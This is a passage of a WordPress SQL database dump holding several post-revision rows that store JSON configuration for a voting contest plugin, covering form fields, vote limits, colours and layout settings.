0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\"}','A','','inherit','closed','closed','','787-revision-v1','','','2022-02-08 13:14:11','2022-02-08 07:44:11','',787,'https://mangomitra.in/?p=846',0,'revision','',0),(850,1,'2022-02-08 14:08:19','2022-02-08 08:38:19','{\"id\":\"787\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"96a6af3c-99c5-4bf7-a0c6-39c364363be7\",\"type\":\"text\",\"name\":\"field\",\"label\":\"name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"2fdee483-91bf-4618-a7a6-cf4615416004\",\"type\":\"number\",\"name\":\"field_copy\",\"label\":\"Field\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"aad5c7ba-ec2b-4bc7-996f-66fdaa85eeb2\",\"type\":\"image\",\"name\":\"field_copy_copy\",\"label\":\"insert image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\",\"seo\":{\"contest\":{\"description\":\"gtdawe\"}}}','A','','inherit','closed','closed','','787-revision-v1','','','2022-02-08 14:08:19','2022-02-08 08:38:19','',787,'https://mangomitra.in/?p=850',0,'revision','',0),(851,1,'2022-02-08 14:09:40','2022-02-08 08:39:40','{\"id\":\"787\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"96a6af3c-99c5-4bf7-a0c6-39c364363be7\",\"type\":\"text\",\"name\":\"field\",\"label\":\"name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"2fdee483-91bf-4618-a7a6-cf4615416004\",\"type\":\"number\",\"name\":\"field_copy\",\"label\":\"Field\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"aad5c7ba-ec2b-4bc7-996f-66fdaa85eeb2\",\"type\":\"image\",\"name\":\"field_copy_copy\",\"label\":\"insert image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":0}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\",\"seo\":{\"contest\":{\"description\":\"gtdawe\"}}}','A','','inherit','closed','closed','','787-revision-v1','','','2022-02-08 14:09:40','2022-02-08 08:39:40','',787,'https://mangomitra.in/?p=851',0,'revision','',0),(852,1,'2022-02-08 14:17:40','2022-02-08 08:47:40','{\"id\":\"787\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"96a6af3c-99c5-4bf7-a0c6-39c364363be7\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"aad5c7ba-ec2b-4bc7-996f-66fdaa85eeb2\",\"type\":\"image\",\"name\":\"field_copy_copy\",\"label\":\"insert image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission {{id}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":0}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 